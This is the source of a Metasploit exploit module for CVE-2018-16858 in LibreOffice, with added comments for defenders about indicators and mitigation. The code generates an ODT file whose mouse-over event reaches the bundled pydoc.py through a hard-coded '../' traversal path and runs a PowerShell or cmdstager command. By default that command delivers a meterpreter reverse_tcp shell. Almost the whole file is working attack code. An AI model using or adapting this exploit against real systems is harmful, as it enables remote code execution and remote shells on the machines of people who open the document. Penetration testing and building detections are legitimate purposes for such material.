Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit file-format module for CVE-2018-16858 (LibreOffice).
#
# What the code below does: it renders an ERB template shipped in the
# framework's data directory and writes the result out under FILENAME
# (default 'librefile.odt'). Per the module description, the document binds a
# mouse-over event to a bundled Python script that is reached through a
# directory traversal, and the referenced function passes its arguments to
# os.system.
#
# Notes for defenders, derived from this file:
# - The script reference is a relative path made of '../' segments ending in
#   'pydoc.py' (see #exploit). When inspecting ODT/FODT content, an event
#   binding whose script location contains traversal sequences or names
#   pydoc.py is a static indicator worth alerting on.
# - The traversal path is hard-coded to 'python-core-3.5.5'; presumably the
#   reference only resolves on installs that bundle that directory - confirm
#   against the affected builds before relying on it for scoping.
# - On the Windows target the command is produced by cmd_psh_payload, so
#   execution presumably surfaces as a command interpreter / PowerShell child
#   of the office process - verify against your own process telemetry.
# - Mitigation is to run a LibreOffice build that contains the vendor fix for
#   CVE-2018-16858; the fixed versions are not stated in this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  # Registers the module metadata (name, description, references, targets)
  # and the single user-facing option, FILENAME.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LibreOffice Macro Code Execution',
        'Description' => %q{
          LibreOffice comes bundled with sample macros written in Python and
          allows the ability to bind program events to them. A macro can be tied
          to a program event by including the script that contains the macro and
          the function name to be executed. Additionally, a directory traversal
          vulnerability exists in the component that references the Python script
          to be executed. This allows a program event to execute functions from Python
          scripts relative to the path of the samples macros folder. The pydoc.py script
          included with LibreOffice contains the tempfilepager function that passes
          arguments to os.system, allowing RCE.

          This module generates an ODT file with a mouse over event that
          when triggered, will execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alex Inführ', # Vulnerability discovery and PoC
          'Shelby Pace' # Metasploit Module
        ],
        'References' => [
          [ 'CVE', '2018-16858' ],
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
        ],
        'Platform' => [ 'win', 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        # Order matters: #exploit selects the command generator by target
        # index (0 = Windows, 1 = Linux).
        'Targets' => [
          [
            'Windows',
            {
              'Platform' => 'win',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Payload' => 'windows/meterpreter/reverse_tcp',
              'DefaultOptions' => { 'PrependMigrate' => true }
            }
          ],
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Payload' => 'linux/x86/meterpreter/reverse_tcp',
              'DefaultOptions' => { 'PrependFork' => true },
              'CmdStagerFlavor' => 'printf',
            }
          ]
        ],
        'DisclosureDate' => "2018-10-18",
        'DefaultTarget' => 0,
        # All three properties are declared unknown, so the metadata makes no
        # claim about crash safety, repeatability or artifacts left behind.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Required option; name of the document that #exploit writes.
        OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
      ]
    )
  end

  # Builds the Windows command string and stores it in @cmd.
  #
  # The command comes from cmd_psh_payload (Msf::Exploit::Powershell) using
  # the encoded payload and the first architecture of the payload instance.
  #
  # @return [String] the command stored in @cmd, with ' && echo' appended
  def gen_windows_cmd
    opts =
      {
        :remove_comspec => true,
        :method => 'reflection',
        :encode_final_payload => true
      }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
    # NOTE(review): the trailing ' && echo' presumably absorbs whatever the
    # called function appends to the command line - confirm against the
    # template and the referenced write-up.
    @cmd << ' && echo'
  end

  # Builds the Linux command string and stores it in @cmd.
  #
  # Only the first element returned by generate_cmdstager is used; the
  # Linux target sets 'CmdStagerFlavor' to 'printf'.
  #
  # @return [String] the command stored in @cmd, with ' && echo' appended
  def gen_linux_cmd
    @cmd = generate_cmdstager.first
    # Same suffix as in gen_windows_cmd (see the review note there).
    @cmd << ' && echo'
  end

  # Renders the document template and returns the resulting text.
  #
  # The template is evaluated with this method's binding, so the locals
  # `path` and `text_content` and the instance variable @cmd are visible to
  # it; presumably the template references them, but the template itself is
  # not shown here. Do not rename these locals without checking the template.
  #
  # @param path [String] relative script path; not used directly in this
  #   method, only exposed to the template through the binding
  # @return [String] the rendered document
  def gen_file(path)
    # Random alphabetic filler, 10 to 15 characters long.
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    libre_file
  rescue Errno::ENOENT
    # A missing template file is reported as a module failure instead of
    # letting the raw Errno::ENOENT propagate.
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  # Module entry point: builds the command for the selected target, renders
  # the document and writes it with file_create.
  #
  # Fails with Failure::BadConfig when TARGET is neither 0 nor 1.
  def exploit
    # Relative traversal to the bundled pydoc.py. The Python directory name
    # is fixed to 'python-core-3.5.5', which also makes this string a
    # convenient thing to search for when triaging suspicious documents.
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
    # Target indexes follow the order of 'Targets' in #initialize.
    if datastore['TARGET'] == 0
      gen_windows_cmd
    elsif datastore['TARGET'] == 1
      gen_linux_cmd
    else
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
    fodt_file = gen_file(path)

    file_create(fodt_file)
  end
end